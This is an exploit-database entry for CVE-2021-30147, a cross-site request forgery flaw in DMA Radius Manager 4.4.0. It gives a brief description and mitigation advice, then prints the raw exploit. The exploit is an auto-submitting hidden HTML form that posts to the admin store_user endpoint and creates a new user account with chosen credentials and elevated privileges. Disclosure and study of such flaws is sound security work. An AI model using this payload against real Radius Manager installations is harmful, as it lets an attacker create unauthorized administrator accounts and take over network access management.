DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)

vendor:

DMA Radius Manager

by:

Issac Briones

8.8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: DMA Radius Manager

Affected Version From: 4.4.0

Affected Version To: 4.4.0

Patch Exists: NO

Related CWE: CVE-2021-30147

CPE: a:dmasoftlab:dma_radius_manager:4.4.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2021

DMA Radius Manager 4.4.0 – Cross-Site Request Forgery (CSRF)

DMA Radius Manager 4.4.0 is vulnerable to Cross-Site Request Forgery (CSRF). An attacker can craft a malicious HTML page that contains a form with malicious parameters and submit it to the vulnerable application. This can be used to create a new user with administrative privileges. This vulnerability is tracked as CVE-2021-30147.

Mitigation:

The application should validate the origin of the request and verify that the request is coming from a trusted source. Additionally, the application should implement a CSRF token to verify the authenticity of the request.

Source

Exploit-DB raw data:

# Exploit Title: DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)
# Date: April 8, 2021 (04/08/2021)
# Exploit Author: Issac Briones
# Vendor Homepage: http://www.dmasoftlab.com/
# Software Download: https://sourceforge.net/projects/radiusmanager/
# Version: 4.4.0
# CVE: CVE-2021-30147

<html>
	<body>
		< ! -- Change IP addr to IP addr that RADIUS manager is located -- >
		<form action="http://192.168.1.2/admin.php?cont=store_user" method="POST">
			<input type="hidden" name="username" value="csrf_usr" />
			<input type="hidden" name="enableuser" value="1" />
			<input type="hidden" name="acctype" value="0" />
			<input type="hidden" name="password1" value="csrfusr" />
			<input type="hidden" name="password2" value="csrfusr" />
			<input type="hidden" name="maccm" value="" />
			<input type="hidden" name="mac" value="" />
			<input type="hidden" name="ipmodecpe" value="0" />
			<input type="hidden" name="simuse" value="1" />
			<input type="hidden" name="firstname" value="" />
			<input type="hidden" name="lastname" value="" />
			<input type="hidden" name="company" value="" />
			<input type="hidden" name="address" value="" />
			<input type="hidden" name="city" value="" />
			<input type="hidden" name="zip" value="" />
			<input type="hidden" name="country" value="" />
			<input type="hidden" name="state" value="" />
			<input type="hidden" name="phone" value="" />
			<input type="hidden" name="mobile" value="" />
			<input type="hidden" name="email" value="" />
			<input type="hidden" name="taxid" value="" />
			<input type="hidden" name="srvid" value="0" />
			<input type="hidden" name="downlimit" value="0" />
			<input type="hidden" name="uplimit" value="0" />
			<input type="hidden" name="comblimit" value="0" />
			<input type="hidden" name="expiration" value="2021-04-06" />
			<input type="hidden" name="uptimelimit" value="00:00:00" />
			<input type="hidden" name="credits" value="0.00" />
			<input type="hidden" name="contractid" value="" />
			<input type="hidden" name="contractvalid" value="" />
			<input type="hidden" name="gpslat" value="" />
			<input type="hidden" name="gpslong" value="" />
			<input type="hidden" name="comment" value="" />
			<input type="hidden" name="superuser" value="{SUPERUSER}" />
			<input type="hidden" name="lang" value="English" />
			<input type="hidden" name="groupid" value="1" />
			<input type="hidden" name="custattr" value="" />
			<input type="hidden" name="cnic" value="" />
			<input type="hidden" name="cnicfile1" value="(binary)" />
			<input type="hidden" name="cnicfile2" value="(binary)" />
			<input type="hidden" name="adduser" value="Add user" />
		</form>
	<script>
		document.forms[0].submit();
	</script>
	</body>

</html>